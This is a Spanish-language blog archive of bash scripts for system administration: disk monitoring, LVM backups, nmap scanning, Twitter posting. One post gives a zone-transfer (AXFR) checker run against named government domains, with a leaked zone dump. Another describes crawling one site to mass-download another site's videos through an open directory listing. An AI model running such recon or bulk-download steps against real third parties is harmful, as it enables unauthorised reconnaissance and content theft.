El rincón de Zerial » script

Búsqueda de servicios DNS con Transferencia de Zona abierta (AXFR)

Zerial — Thu, 11 Aug 2011 18:00:39 +0000

Ya vimos que los servidores mal configurados que permiten realizar transferencias de zona sin restricciones desde cualquier IP son muchos.

Para saber si un servidor DNS es “vulnerable” a este tipo de ataque usamos la herramienta dig, primero obtenemos los dns que estan asociados al dominio, para este ejemplo usaremos el dominio zerial.org.

$ dig NS zerial.org ; < <>> DiG 9.7.3 < <>> NS zerial.org ;; global options: +cmd ;; Got answer: ;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 64152 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 6


;; QUESTION SECTION:

;zerial.org.			IN	NS

;; ANSWER SECTION: zerial.org. 86400 IN NS ns1.linode.com. zerial.org. 86400 IN NS ns3.linode.com. zerial.org. 86400 IN NS ns2.linode.com. zerial.org. 86400 IN NS ns5.linode.com. zerial.org. 86400 IN NS ns4.linode.com.

Ya tenemos la lista de los servidores dns de zerial.org, para probar la transferencia de zona cambiamos NS por AXFR y forzamos que use el DNS que nosotros elijamos, en este caso probaremos ns3.linode.com:

$ dig AXFR zerial.org @ns3.linode.com

; < <>> DiG 9.7.3 < <>> AXFR zerial.org @ns3.linode.com ;; global options: +cmd ; Transfer failed.

Failed. No hemos logrado transferir la zona desde ns3.linode.com, lo que nos indica que aparentemente se encuentra bien configurado.
Otro ejemplo usando un dominio que sepamos que tiene esta falla: finanzas.gov.ar.
Obtenemos los dos:

$ dig NS finanzas.gov.ar


; < <>> DiG 9.8.0-P4 < <>> NS finanzas.gov.ar

;; global options: +cmd

;; Got answer:

;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 38476

;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 2
;; QUESTION SECTION:

;finanzas.gov.ar.		IN	NS

;; ANSWER SECTION: finanzas.gov.ar. 7006 IN NS ns3.zoneedit.com. finanzas.gov.ar. 7006 IN NS ns9.zoneedit.com.

Probamos el segundo dns, ns9.zoneedit.com.

$ dig AXFR finanzas.gov.ar @ns9.zoneedit.com

; < <>> DiG 9.8.0-P4 < <>> AXFR finanzas.gov.ar @ns9.zoneedit.com ;; global options: +cmd finanzas.gov.ar. 7200 IN SOA ns3.zoneedit.com. soacontact.zoneedit.com. 2011266765 2400 360 1209600 300 finanzas.gov.ar. 7200 IN NS ns3.zoneedit.com. finanzas.gov.ar. 7200 IN NS ns9.zoneedit.com. finanzas.gov.ar. 7200 IN A 201.253.123.35 finanzas.gov.ar. 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM. finanzas.gov.ar. 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM. finanzas.gov.ar. 7200 IN MX 0 ASPMX.L.GOOGLE.COM. finanzas.gov.ar. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM. finanzas.gov.ar. 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM. finanzas.gov.ar. 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM. finanzas.gov.ar. 7200 IN MX 20 ASPMX5.GOOGLEMAIL.COM. mail.finanzas.gov.ar. 7200 IN CNAME ghs.google.com. googleffffffff85ca3fa2.finanzas.gov.ar. 7200 IN CNAME google.com. asignaciones.finanzas.gov.ar. 7200 IN A 186.136.205.252 docs.finanzas.gov.ar. 7200 IN CNAME ghs.google.com. www.finanzas.gov.ar. 7200 IN A 201.253.123.35 mapas.finanzas.gov.ar. 7200 IN A 201.253.123.35 finanzas.gov.ar. 7200 IN SOA ns3.zoneedit.com. soacontact.zoneedit.com. 2011266765 2400 360 1209600 300 ;; Query time: 355 msec ;; SERVER: 66.240.231.42#53(66.240.231.42) ;; WHEN: Thu Aug 11 13:49:31 2011 ;; XFR size: 18 records (messages 18, bytes 1138)

La transferencia de zona se hizo de forma exitosa.

Para poder analizar de forma automatica un listado de dominios, hice un script en bash que usa DIG para obtener los dns de cada dominio y prueba realizar AXFR por cada dominio en todos sus dns.

#!/bin/bash

digcmd=$(which dig)
domain=$1
echo -n "[+] Getting NS domains from $1 ..."
ns_domains=$(dig NS $domain @4.2.2.2|grep ^$domain|awk {'print $5'}|sed 's/.$//g')
echo -e "\t[OK]"
for ns in $ns_domains; do echo "[-] Found: "$ns; done
for ns in $ns_domains
do
	echo -n "Trying Zone Transfer from $ns: "
	$digcmd AXFR $domain @$ns|egrep 'Transfer failed|timed out|end of file'>/dev/null
	if [ $? -eq 1 ]
	then
		echo -e "\tSuccess."
	else
		echo -e "\tFail."
	fi
done

La forma de ejecucion es:

]$ sh zonetransfer.sh finanzas.gov.ar [+] Getting NS domains from finanzas.gov.ar ... [OK] [-] Found: ns9.zoneedit.com [-] Found: ns3.zoneedit.com Trying Zone Transfer from ns9.zoneedit.com: Success. Trying Zone Transfer from ns3.zoneedit.com: Success.

Nos indica que es posible realizar una transferencia de zona desde ns3.zoneedit.com y ns9.zoneedit.com para el dominio finanzas.gov.ar.
Tambien podemos pasarle un archivo que contenga una lista de dominios que queramos analizar de forma masiva. Por ejemplo, tenemos un archivo llamado dominios.txt con los dominios:
finanzas.gov.ar transparencia.cl gobierno.cl argentina.gov.ar gobierno.es microsoft.com

Ejecutamos:

$ for dom in $(cat dominios.txt); do sh zonetransfer.sh $dom; done [+] Getting NS domains from finanzas.gov.ar ... [OK] [-] Found: ns9.zoneedit.com [-] Found: ns3.zoneedit.com Trying Zone Transfer from ns9.zoneedit.com: Success. Trying Zone Transfer from ns3.zoneedit.com: Success. [+] Getting NS domains from transparencia.cl ... [OK] [-] Found: ns02.000webhost.com [-] Found: ns01.000webhost.com Trying Zone Transfer from ns02.000webhost.com: Fail. Trying Zone Transfer from ns01.000webhost.com: Fail. [+] Getting NS domains from gobierno.cl ... [OK] [-] Found: ga.interior.gov.cl [-] Found: gb.interior.gov.cl [-] Found: ns1.presidencia.cl Trying Zone Transfer from ga.interior.gov.cl: Fail. Trying Zone Transfer from gb.interior.gov.cl: Fail. Trying Zone Transfer from ns1.presidencia.cl: Success. [+] Getting NS domains from argentina.gov.ar ... [OK] [-] Found: nsii.arcert.gov.ar [-] Found: nsii.sgp.gov.ar Trying Zone Transfer from nsii.arcert.gov.ar: Fail. Trying Zone Transfer from nsii.sgp.gov.ar: Fail. [+] Getting NS domains from gobierno.es ... [OK] [-] Found: sun.rediris.es [-] Found: chico.rediris.es [-] Found: dns1.mpr.es [-] Found: dns2.mpr.es Trying Zone Transfer from sun.rediris.es: Fail. Trying Zone Transfer from chico.rediris.es: Fail. Trying Zone Transfer from dns1.mpr.es: Fail. Trying Zone Transfer from dns2.mpr.es: Fail. [+] Getting NS domains from microsoft.com ... [OK] [-] Found: ns3.msft.net [-] Found: ns4.msft.net [-] Found: ns1.msft.net [-] Found: ns2.msft.net [-] Found: ns5.msft.net Trying Zone Transfer from ns3.msft.net: Fail. Trying Zone Transfer from ns4.msft.net: Fail. Trying Zone Transfer from ns1.msft.net: Fail. Trying Zone Transfer from ns2.msft.net: Fail. Trying Zone Transfer from ns5.msft.net: Fail.

Ya tenemos el output del script, donde nos dice que los dns de finanzas.gov.ar y uno de gobierno.cl permite AXFR.

simple-pytweet: El reemplazo de twitsh

Zerial — Sat, 23 Apr 2011 20:04:10 +0000

Hace un tiempo publiqué un script que servia para twittear de forma rapida y sin tener ninguna “aplicación” aparatosa, el script estaba escrito en bash y en ese tiempo usaba metodo de autenticación “plana” e “insegura”. Ahora reescribí el código en python y usando OAuth.
El nuevo script se llama simple-pytweet y si usar Archlinux puedes usar el PKGBUILD que publiqué en AUR, sino puedes descargar el tarball desde http://dev.zerial.org/simple-pytweet.

El código es simple, requiere python-twitter y pyzenity y lee los parametros de OAuth como TOKEN y SECRET etc desde un archivo llamado .simple-pytweet en tu $HOME.

Script monitor de sistemas de archivos y particiones

Zerial — Wed, 14 Jul 2010 19:15:42 +0000

Existen herramientas que nos permiten monitorear distintas cosas en un parque de servidores, como Zabbix, Nagios, etc. Pero hay veces que no es posible, ya sea por recursos o por tiempo, implementar una solución de monitoreo de alto nivel, por lo que recurrimos a los scrtips. Estoy seguro que bash, las llaves publicas y privadas para la autentificación, y cron son unos de nuestros mejores amigos al momento de querer monitorear o administrar máquinas simultaneamente.

Con du podemos saber el uso de disco de nuestro sistema y con un pequeño script en bash podemos mejorar la salida de este comando.

ssh 10.0.0.56 -p5022 "df -hPl"|awk -F ' ' '{print $1,$4,$6,$5}' |egrep -v "Avail|Dispo|Use|Use"

Esto nos devuelve en 4 columnas el dispositivo, espacio disponible, punto de montaje y porcentaje usado.

Algo similar a:

/dev/mapper/VolGroup_25980-LogVol1 3.5G / 75%
/dev/sda1 80M /boot 16%
none 16G /dev/shm 0%
/dev/mapper/VolGroup_25980-LogVolHome 30G /home 69%
/dev/mapper/VolGroup_25980-LogVol2 4.6G /tmp 1%
/dev/mapper/VolGroup_25980-LogVol5 6.6G /usr 29%
/dev/mapper/VolGroup_25980-LogVol4 14G /var 87%
/dev/mapper/VolGroup_25980-mysql 7.0G /var/lib/mysql 63%

Mi idea es trabajar con threshold (umbral) y gatillar eventos según el umbral alcanzado. Por ejemplo, con un threshold del 80% asociado al porcentaje utilizado, que envie emails de “advertencias” y con el 90% notificaciones de “criticidad del sistema de archivos”. Lo que querìa lograr era que todos los dias se monitoreen los sistemas de archivos, generando reportes diarios de los sistemas criticos y, semanalmente, un reporte general, donde me muestre detalladamente los “normales”, “advertencias” y los “criticos”. La salida esperada es algo asi:

[+] Server: x.x.x.x (x.hostname)
[-] [Dev:/dev/hda2] [Mount:/] [Free:4.2G] [Used:5%]

[-] [Dev:/dev/hda1] [Mount:/boot] [Free:83M] [Used:11%]

[-] [Dev:/dev/hda3] [Mount:/home] [Free:3.6G] [Used:19%]

[-] [Dev:/dev/hda6] [Mount:/tmp] [Free:1.7G] [Used:1%]

[-] [Dev:/dev/hda5] [Mount:/usr] [Free:8.6G] [Used:3%]

[-] [Dev:/dev/hda7] [Mount:/var] [Free:12G] [Used:21%]

No critical filesystems

[...] cuando no hay sistemas de archivos criticos y,

[+] Server: y.y.y.y (y.hostname)
[-] [Dev:/dev/mapper/VolGroup00-LogVol00] [Mount:/] [Free:16G] [Used:14%]

[-] [Dev:/dev/sda1] [Mount:/boot] [Free:80M] [Used:15%]

[-] [Dev:/dev/shm] [Mount:/dev/shm] [Free:2.0G] [Used:0%]

[-] [Dev:/dev/mapper/VolGroup00-LogVol02] [Mount:/var] [Free:7.4G] [Used:74%]

[-] [Dev:/dev/mapper/VolGroup00-LogVol03] [Mount:/backup] [Free:13G] [Used:66%]

[-] [Dev:/dev/mapper/VolGroup00-LogVol04] [Mount:/home] [Free:6.6G] [Used:93%] [***CRITICAL***]

[-] [Dev:/dev/mapper/VolGroup00-LogVol05] [Mount:/usr/local] [Free:7.3G] [Used:89%] [***WARNING***]

cuando hay criticos y cuando hay emergencias, es decir, cuando se alcanza el umbral del 90% y 80%, respectivamente.

El script que hice es el siguiente:

#/bin/bash -e
warning_threshold="80%"
critical_threshold="90%"

warnings=0;
critical=0;
for host in $(grep -v ^# ips.txt);
do
	critical_count=0;
	hostname=$(echo -n $host|cut -f1 -d ":")
        ip=$(echo -n $host|cut -f2 -d ":")
        port=$(echo -n $host|cut -f3 -d ":")
	echo "\n[+] Server: $ip ($hostname)"
	filesystems=$(ssh $ip -p$port "df -Phl"|egrep -v 'Avail|Dispo|tmpfs|udev|Uso|Use'|awk -F ' ' '{print $6}');
	for FS in $filesystems;
	do
		alert="";
		temp=$(ssh $ip -p$port "df -hPl $FS"|awk -F ' ' '{print $1,$4,$6,$5}' |egrep -v 'Avail|Dispo|Uso|Use');
		dev=$(echo $temp |cut -f1 -d " ");
		mountpoint=$(echo $temp |cut -f3 -d " ");
		size=$(echo $temp |cut -f2 -d " ");
		used=$(echo $temp |cut -f4 -d " ");
		_wthreshold=$(echo -n $warning_threshold |sed 's/%//g');
		_cthreshold=$(echo -n $critical_threshold |sed 's/%//g');
		_used=$(echo -n $used |sed 's/%//g');
		case "$1" in
			weekly)
				if [ $_used -gt $_wthreshold ]; then
                                        alert="[***WARNING***]"; warning=$(expr $warning + 1);
                                fi
				if [ $_used -gt $_cthreshold ]; then
					alert="[***CRITICAL***]"; critical=$(expr $critical + 1);
				fi
				echo "[-] [Dev:$dev] [Mount:$mountpoint] [Free:$size] [Used:$used] $alert";
				echo "";
			;;
			daily)
                                if [ $_used -gt $_cthreshold ]; then
                                        alert="[***CRITICAL***]";
					critical_count=$(expr $critical_count + 1);
                                	echo "[-] [Dev:$dev] [Mount:$mountpoint] [Free:$size] [Used:$used] $alert";
					echo "";
				fi
			;;
		esac
	done
	if [ $critical_count -eq 0 ]; then
		echo "No critical filesystems"
		critical_count=0;
	fi
done
if [ "$1" = "weekly" ]; then
	echo "________________"
	echo "Warnings: $warning\t|";
	echo "Criticals: $critical\t|";
fi

Para que el script funcione, es necesario que en la misma ruta donde se encuentra, exista el archivo ips.txt que debe tener, bajo la sintaxis hostname:ip:port, la información para que el script se conecté por ssh a las máquinas. Para que sea más dinámico y no requiera la intervención de un humano, la máquina donde se ejecutará el script debe tener una llave privada cuya llave publica esté repartida en los servidores que se desean monitorear.
El script necesita un argumento para funcionar, puede ser “weekly” o “daily”, segun se necesite. Con daily el script genera reportes donde mostrará solamente los criticos, mientras que con weekly hará un reporte general.

En el cron tengo agregado que todos los dias a las 9AM, haga un reporte diario y todos los lunes a las 8AM uno general (weekly) y los envie por correo a los responsables.

8 * * 1 cd /root/du_alert; sh alert.sh weekly |mail -s “Weekly Disk Usage Status” encargado@dominio.cl — -F “System Administrator”
0 9 * * * cd /root/du_alert; sh alert.sh daily |mail -s “Daily Disk Usage Status” encargado@dominio.cl — -F “System Administrator”

Imagenes y snapshots: Respaldo de servidores

Zerial — Mon, 22 Feb 2010 13:15:02 +0000

Mi propósito era crear imágenes de todos los servidores del datacenter para que, en caso de cualquier contingencia, levantar un nuevo servidor identico simplemente traspasando la imágen de respaldo hacia ese servidor. Los sistemas estaban instalados usando volumenes lógicos (LVM) por lo que sería mucho más fácil crear imágenes y snapshots de respaldos. En un prinicpio pensé hacer directamente dd sobre los volumenes lógicos pero la imágen se corrompía y en muchos casos no podía volver a recuperarla. Existe la posibilidad de montar el volumen lógico en un directorio y respaldar, usando tar, bzip y esas cosas, sólo los archivos, pero no era mi propósito, ya que para restaurar solamente los archivos, debía tener una partición ya preparada, con el sistma de ficheros, sistema instalado, etc etc. En cambio, con la imágen simplemente hacia un dd para restaurarla, sin tener el sistema de archivos creado, etc.

Por twitter me recomendaron varias opciones. @Apostols me recomendó las herramientas “puppet” y “rlbackup”, mientras que @ssugasti “mondorescue”, pero yo seguia con mi idea de usar directamente “dd”. Debía hacer el mismo procedimiento en mas de 40 servidores, por lo que usar una aplicación “cliente->servidor” no era mi solución. Usar aplicaciones que requieran modo grafico o que requieran mucha interacción con el usuario tampoco me servian, yo necesitaba algo automatizado que pueda dejar corriendo de noche y volver al otro día y encontrar el trabajo hecho.

Leyendo el manual de LVM, especialmente el de lvcreate, encontré la opción “snapshot” que básicamente le toma una “foto” al volumen lógico de origen y crea un nuevo volumen con ese preciso instante en que se hizo el snapshot, de ésta forma la partición original podrá ser actualizara mientras que el snapshot se respalda sin problemas. Luego de eso, el snapshot se elimina y se guarda la imágen. La rutína sería mas o menos asi:

# lvcreate --snapshot /dev/Vol00/var --name var-snap -L100k # dd if=/dev/Vol00/var-snap of=/backup/var.img # lvremove -f /dev/Vol00/var-snap

De esta forma, creamos un snapshot llamado “var-snap” en base a la partición (o volumen) /dev/Vol00/var, luego, usando dd, creamos la imágen de dicha partición y la guardamos en /backup. Finalmente eliminamos el snapshot.
Para tener aún más certesa de que todo funcionaría, tambien decidí empaquetar, comprimir y guardar los ficheros, por lo que antes de eliminarla (lvremove) la debo montar y hacer un tar. La rutina quedaría así:

# lvcreate --snapshot /dev/Vol00/var --name var-snap -L100k # dd if=/dev/Vol00/var-snap of=/backup/var.img # mount /dev/Vol00/var-snap /mnt # tar cfjv /bakcup/var.tbz2 /mnt # umount /mnt # lvremove -f /dev/Vol00/var-snap

En mi caso, /backup corresponde a un punto de montaje de red NFS.
Mi misión era realizar ésta misma rutina en más de 40 servidores, por lo que necesitaba hacer un script que se paseara por todos los servidores y ejecutara estos comandos.

#!/bin/bash

IDENTITYFILE=$HOME/.ssh/id_rsa
MACHINES=servidores.list
DATE=$(date +%d%m%Y)
NFS=/mnt/imagenes/servers/
DIR_SNAPSHOT=/mnt/snapshot

for server in $(cat servidores.list);
do
        echo "Respaldando $server ..."
        ssh -i $IDENTITYFILE $server "lvdisplay" >/tmp/lvdisplay_temp
        lvdisplay=$(awk '
                /LV Name/ { name = $3 }
                /VG Name/ { print name","$3 } ' /tmp/lvdisplay_temp)
        for _logicalv in $lvdisplay;
        do
                lvname=$(echo $_logicalv |cut -f1 -d ","|cut -f4 -d "/")
                logicalv=$(echo $_logicalv |cut -f2 -d ",")
                echo -e "\tVolumen Logico: $lvname"
                ssh $server "lvcreate --size 100m --snapshot --name $lvname-snap /dev/$logicalv/$lvname"
                ssh $server "mount /dev/$logicalv/$lvname-snap $DIR_SNAPSHOT"
                ssh $server "mkdir $NFS$server"
                ssh $server "tar cfj $NFS$server/snapshot_$lvname-$DATE.tar.bz2 $DIR_SNAPSHOT"
                ssh $server "umount $DIR_SNAPSHOT"
                ssh $server "dd if=/dev/$logicalv/$lvname-snap of=$NFS$server/image_$lvname-$DATE.img"
                ssh $server "lvremove -f /dev/$logicalv/$lvname-snap"
                echo -e "\tArchivo imagen: $NFS$server/image_$lvname-$DATE.img"
                echo -e "\tArchivo tarball: $NFS$server/snapshot_$lvname-$DATE.tar.bz2"
        done
done
scp /tmp/lvdisplay_temp $server:$NFS$server/lvdisplay

El script trabaja con la salida del comando lvdisplay que entrega una salida con los detalles de cada volumen lógico. Lee un fichero llamado servidores.list y hace un recorrido línea por línea, conectándose a cada servidor y ejecutando las instrucciones necesarias. Para hacer el proceso más eficiente y automatizado es necesario, previamente, copiar todas las claves públicas a cada servidor, para evitar la autentificación.

Asaltando un sitio de series online

Zerial — Tue, 16 Feb 2010 00:33:35 +0000

De aburridos, junto con E.A.S (o xwall), nos dedicamos a buscar un sitio que brinde el servicio de series de en linea para encontrar la forma de tomar prestadas todas las series alojadas en el servidor. Imaginense algo como YouTube, pero tan vulnerable que fuese posible extraer todos los videos que hay en la red.
Bien, nuestro objetivo fue un sitio de series de animé en línea llamado “Efecto animé” que, mediante el sitio Satanick.net logramos descargar todas las series y capítulos que se servían.

La teoría es sencilla, la idea era encontrar un link directo a los distintos archivos multimedia o bien un enlace a algun directorios que los contenga, para luego descargar todo el contenido del directorio.
El fallo por parte de ellos fue dejar que se liste el contenido de directorios, de esta forma pudimos tener acceso a informacón como la siguiente:

Luego, con un poco de magia, simplemente descargamos el contenido de todo ese directorio.

Todo fue gracias al sitio “Satanick” el cual contiene un flash que provee al usuario poder ver series en línea, afortunadamente lamentablemente si vemos el código fuente nos encontramos con la siguiente sorpresa:

Miren detenidamente el código a ver si encuentran algo que nos ayude a nuestro propósito. Encontramos:

file=http://efectoanime.com/server/dn0te/06.mp4

Con esto ya podemos deducir que todos los videos se encuentran en la URL http://efectoanime.com/server/XXX, donde XXX corresponde al nombre de la serie. Como vimos en la imágen que les mostré anteriormente (donde se listaban los archivos del directorio thundercats/), está permitido listado de archivos de un directorio. Nuestro amigo wget será la salvación, ya que con el parametro -r es posible descargar un directorio.

Bien, ahora nos falta automatizar el proceso. Las URL de Satanick, donde se encuetran los videos, son de la forma http://satanick.com/?page_id=XXX, por lo que podemos asumir que cada ID corresponde a una página y en cada página es posible que encontremos links como el que les acabo de mostrar (el html de más arriba). Entonces mi idea fue crear un script que recorriera todas las páginas desde XXX hasta XXX+n. Pensando que si lo hago desde 0 se iba a demorar una eternidad, solo lo hice desde el 3000 hasta el 10000, luego cada página examinada deberá ser parseada y se debe encontrar un patrón que nos permita obtener la URL donde se encuentran los videos.
Yo lo hice de la siguiente forma:

for x in $(seq 3000 10000); do wget -O - http://satanick.net/?page_id=$x |grep "http://efectoanime.com/server" |awk -F '&' {'print $2'}>> lista_videos_satanick; done

Si lo queremos ver más bonito y en forma de “script”:

#!/bin/bash
for x in $(seq 3000 10000);
do
   wget -O - http://satanick.net/?page_id=$x |grep "http://efectoanime.com/server" |awk -F '&' {'print $2'}>> lista_videos_satanick;
done

El archivo “lista_videos_satanick” va a guardar todas las URL que encuentre y quedarás más o menos así:

file=http://efectoanime.com/server/hades/h29.mp4
file=http://efectoanime.com/server/hades/h29.mp4
file=http://efectoanime.com/server/hades/h30.mp4
file=http://efectoanime.com/server/hades/h30.mp4
file=http://efectoanime.com/server/hades/h31.mp4
file=http://efectoanime.com/server/hades/h31.mp4
file=http://efectoanime.com/server/hades/h31.mp4
file=http://efectoanime.com/server/thundercats/Th71.mp4
file=http://efectoanime.com/server/thundercats/Th71.mp4
file=http://efectoanime.com/server/thundercats/Th71.mp4
file=http://efectoanime.com/server/thundercats/Th72.mp4
file=http://efectoanime.com/server/thundercats/Th72.mp4
file=http://efectoanime.com/server/thundercats/Th72.mp4
file=http://efectoanime.com/server/thundercats/Th73.mp4
file=http://efectoanime.com/server/thundercats/Th73.mp4
file=http://efectoanime.com/server/thundercats/Th73.mp4
file=http://efectoanime.com/server/thundercats/Th74.mp4
file=http://efectoanime.com/server/thundercats/Th74.mp4

Lo único que debemos hacer es quitarle el principio “file=” y quitar las líneas repetidas:
sed -i 's/file=//g' lista_videos_satanick
Nos quedará algo así:

http://efectoanime.com/server/shippuden/Shippuden_144.mp4

http://efectoanime.com/server/bl34ch/B255.mp4

http://efectoanime.com/server/shippuden/Shippuden_145.mp4

http://efectoanime.com/server/md/612.mp4

http://efectoanime.com/server/bl34ch/B256.mp4

http://efectoanime.com/server/shippuden/Shippuden_146.mp4

http://efectoanime.com/server/thundercats/Th90.mp4

http://efectoanime.com/server/thundercats/Th92.mp4

De todas estas URL lo que nos interesa es sólo http://efectoanime.com/server/XXX, entonces lo arreglamos:

awk -F '/' {'print $1"/"$2"/"$3"/"$4"/"$5'} lista_videos_satanick

Quedará algo así:

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/thundercats

http://efectoanime.com/server/bl34ch

http://efectoanime.com/server/bl34ch

http://efectoanime.com/server/bl34ch

http://efectoanime.com/server/shippuden

http://efectoanime.com/server/shippuden

http://efectoanime.com/server/shippuden

http://efectoanime.com/server/MD

http://efectoanime.com/server/MD

http://efectoanime.com/server/MD

Ahora debemos eliminar las repetidas:

# awk -F '/' {'print $1"/"$2"/"$3"/"$4"/"$5'} lista_videos_satanick |sort|uniq -d


http://efectoanime.com/server/avatar
http://efectoanime.com/server/bl34ch
http://efectoanime.com/server/Chihiro
http://efectoanime.com/server/dn0te
http://efectoanime.com/server/hades
http://efectoanime.com/server/lcanvas
http://efectoanime.com/server/manga
http://efectoanime.com/server/md
http://efectoanime.com/server/MD
http://efectoanime.com/server/sayns
http://efectoanime.com/server/shippuden
http://efectoanime.com/server/thundercats
http://efectoanime.com/server/trailers

http://efectoanime.com/server/Vshow

Luego un script que descarge todos los contenidos de los directorios:

for link in $(cat lista_videos_satanick); do wget -r $link; done

Y listo.

1.6G Death Note.tar
1.6G Saga de Hades.tar

ACTUALIZADO 16/02/2009

Luego de los comentarios de los responsables de los sitios, dando las gracias y diciendo que no les importa porque de todas formas tiene una marca de agua, etc etc.. Los directorios ya no se pueden listar:

http://efectoanime.com/server/thundercats/

Al fin y al cabo, si les importó el tema. Me alegro que les sirviera el post.

Script para escanear la red en busca de servidores y servicios

Zerial — Wed, 10 Feb 2010 13:40:07 +0000

Hace un par de días tuve la necesidad de escanear 3 redes completas, mas de 50 direcciones ip, en busca de servicios que corrieran en ellas. Obviamente, no iba a ingresar a cada servidor y hacer un netstat o revisar uno por uno que servicios tenia instalado, si para eso existe nmap!
Lo que hicste fue separar los rangos de ip en archivos distintos, para tener un orden y escanear la red en orden según los segmentos y luego hice un script que leia cada archivo y escaneaba la ip en busca de servicios, la salida del nmap la parseaba y lo guarda en un archivo separado por comas. En un principio el script mostraba todo en el stdout pero para que quedara más ordenado, preferí hacerlo en un CSV para poder abrirlo con oocalc.
El script me genera un archivo con la siguiente información:

host, IP, Servicio, Puerto, Version

El script es el siguiente:

#!/bin/bash

nmap=/usr/bin/nmap
params="-sV"
tmp_file=/tmp/nmap_scanner_output
output=Servidores.csv
export SCANNER_ERROR=0

echo "host,IP,Servicio,Puerto,Version" >> $output
for ips in ips.*
do
	echo "Analizando $ips ..."
	for ip in $(cat $ips)
	do
		echo -e "\t-> $ip ..."
		ping -c 1 $ip 1>/dev/null 2>&1|| export SCANNER_ERROR=1
		if [ $SCANNER_ERROR = "1" ]; then
			echo -e "\t\t- Host no activo"
		fi
		if [ $SCANNER_ERROR = "0" ]; then
			$nmap $params $ip |grep -v "Starting Nmap" |grep -v "Nmap scan report" |grep -v "Host is up" |grep -v "Not shown" |grep -v "Service detection performed" |grep -v "Nmap done" > $tmp_file
			export _host=$(grep "Service Info" $tmp_file |sed 's/,//g'|grep "Host" |awk -F ' ' {'print $4'} |sed 's/;//g')
			grep tcp $tmp_file |scanner_ip=$ip awk -F " " '{print ENVIRON["_host"]","ENVIRON["scanner_ip"]","$3","$1","$4,$5,$6,$7,$8;}' >>$output
			echo -e "\n" >>$output
		fi
		export SCANNER_ERROR=0
	done
done

El script necesita para funcionar archivos con el listado de direcciones ip. Los (o el) archivo(s) se deben llamar “ips.“. En mi caso, tengo los siguientes archivos:
ips.192 ips.10 ips.172
Dentro de cada archivo hay direcciones del tipo 192.168.0.X, 10.0.0.X, 172.20.20.X…

$ sh scan.sh Analizando ips.10 ... -> 10.0.0.2 ... -> 10.0.0.3 ... -> 10.0.0.11 ... - Host no activo -> 10.0.0.20 ... - Host no activo -> 10.0.0.21 ... - Host no activo -> 10.0.0.70 ... -> 10.0.0.72 ... -> 10.0.0.73 ... Analizando ips.172 ... -> 172.20.20.2 ... -> 172.20.20.3 ... Analizando ips.192 ... -> 192.168.0.55 ... -> 192.168.0.101 ...

[...]

El script generará un output a un archivo llamado “Servidores.csv”, el cual lo podemos encontrar en la misma ruta donde tenemos el script.

mpd-twitter: Publicar en twitter lo que estas escuchando

Zerial — Sun, 10 Jan 2010 19:56:18 +0000

Ultimamente he estado usando el Music Player Daemon (MPD) para escuchar música. Tambien me he dado cuenta que en Twitter hace varios días está de trending topic el hashtag #nowplaying, donde la gente publica lo que está escuchando. En base a ésto y a un poco de imaginación y tiempo libre, cree un script en bash que me permite publicar lo que estoy escuchando.

El script, llamado mpd-twitter, usa el cliente mpc para conectarse a mpd y obtener el artista y nombre de la reproducción actual, hacer el parseo necesario y posteriormente publica un estado en twitter.

#!/bin/bash
#
# Author: Zerial 
# Version: 0.1
# URL: http://dev.zerial.org/mpd-twitter
# License: GPL
#

CONF_FILE=$HOME/.mpd-twitter
USER=$(grep ^USERNAME $CONF_FILE |cut -f 2 -d "=")
PASS=$(grep ^PASSWORD $CONF_FILE |cut -f 2 -d "=")

if [ -f $CONF_FILE ]; then
	BEFORE=$(grep ^BEFORE $CONF_FILE |cut -f 2 -d "=")
	AFTER=$(grep ^AFTER $CONF_FILE |cut -f 2 -d "=")
else
	Xdialog --title "Error" --beep --msgbox "Can't read your local config file. Please copy the /usr/local/share/mpd-twitter/mpd-twitter.local to $HOME/.mpd-twitter" 200 100
	exit
fi

CURRENT_SONG=$(mpc current)
MY_UPDATE="$BEFORE $CURRENT_SONG $AFTER"

curl -u "$USER:$PASS" -d "status=$MY_UPDATE" -d "source=mpd-twit" "http://twitter.com/statuses/update.json"
exit

El archivo de configuración, que debe estar ubicado en ~/.mpd-twitter, es:

#
# Local Config file for mpd-twitter
#
#
# Config the username and password
#
USERNAME=your_username
PASSWORD=your_password
#
# Text before and text after the song.
# example:
# if BEFORE=Listening and AFTER=(powered by xxx)
# mpd-twitter will send "Listening  (powered by xxx)"
#
BEFORE=#nowplaying
AFTER=(powered by mpd)

Para los usuarios de Archlinux que quieran probarlo, he creado un PKGBUILD:

# Contributor: Zerial 
pkgname=mpd-twitter
pkgver=0.1
pkgrel=4
pkgdesc="Publish on twitter what you are listening on MPD"
arch=('i686' 'x86_64')
url="http://dev.zerial.org/mpd-twitter"
license=('GPL')
depends=('xdialog' 'curl' 'mpc')
source=(http://dev.zerial.org/mpd-twitter/${pkgname}_${pkgver}.tar.gz)
md5sums=('3d73b79fa38bd60f637386146137999b')

build(){
	cd $startdir/src/$pkgname
	install -d $startdir/pkg/usr/local/share/mpd-twitter
	mkdir $startdir/pkg/usr/bin
	install -m744 $startdir/src/$pkgname/mpd-twitter.local $startdir/pkg/usr/local/share/mpd-twitter/
	install -m755 $startdir/src/$pkgname/mpd-twitter $startdir/pkg/usr/bin/
}

Tambien lo pueden encontrar en el repositorio AUR.

La idea es lanzar el script con algun hotkey de nuestro gestor de ventanas y asi, cada véz que quieras mostrar lo que estás escuchando, simplemente precionas la combinacion de teclas que configuraste. Por ejemplo, en DWM la he configurado asi:

[...]
/* commands */
static const char *mpdtwittercmd[] = { "mpd-twitter", NULL };
static Key keys[] = {
[...]
      { MODKEY|ShiftMask,                     XK_t,   spawn,  {.v = mpdtwittercmd } },
[...]

